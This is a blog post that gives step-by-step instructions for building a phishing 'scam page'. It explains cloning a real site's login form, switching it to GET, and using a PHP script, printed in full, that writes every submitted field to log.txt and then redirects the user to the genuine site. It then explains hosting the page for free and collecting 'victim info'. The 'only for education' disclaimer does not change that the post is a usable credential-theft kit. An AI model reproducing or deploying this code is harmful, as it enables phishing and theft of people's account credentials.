How To Make your Own Scam Page (only for education) - Geekyrishi

Post Top Ad

How To Make your Own Scam Page (only for education)

How To Make your Own Scam Page (only for education)

Share This


How To Make your Own Scam Page:alien:
    note*    this blog is only for educational purpose admin is not responsible for your any misbehaviour.


Let's Start Something follow this steps,

1. Open Up the Site that You Want to Make The Fake Page From it, After The Load Right Click and Save Page as "Web Page Complete"

2. Now open that page with notepad, and press control+F to access search bar, and then search "login" (I recommend using NotePad++)

3. Behind the word "login" it's written .action, we don't need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx)

4. If You Saw Method="Post" Change it to Method="GET"

5. Ok Now Save it as .Html

6. Open a New Notepad, and Write This Commands
header ('Location:target.com');

$handle = fopen("log.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;
?>

RAW Paste Data

header ('Location:target.com');
$handle = fopen("log.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}
fwrite($handle, "\r\n");

fclose($handle);

exit; ?>

7. Instead of Location: Target.com, Write Your Login Page Address!

8. Now Save this as Login.PHP

9. Go to Website's That offer Free Hosts

10. Upload Website And Done

:m: Note : Look at PHP source, you can see log.txt that's where your victim info's saved.

No comments:

Post a Comment

Post Bottom Ad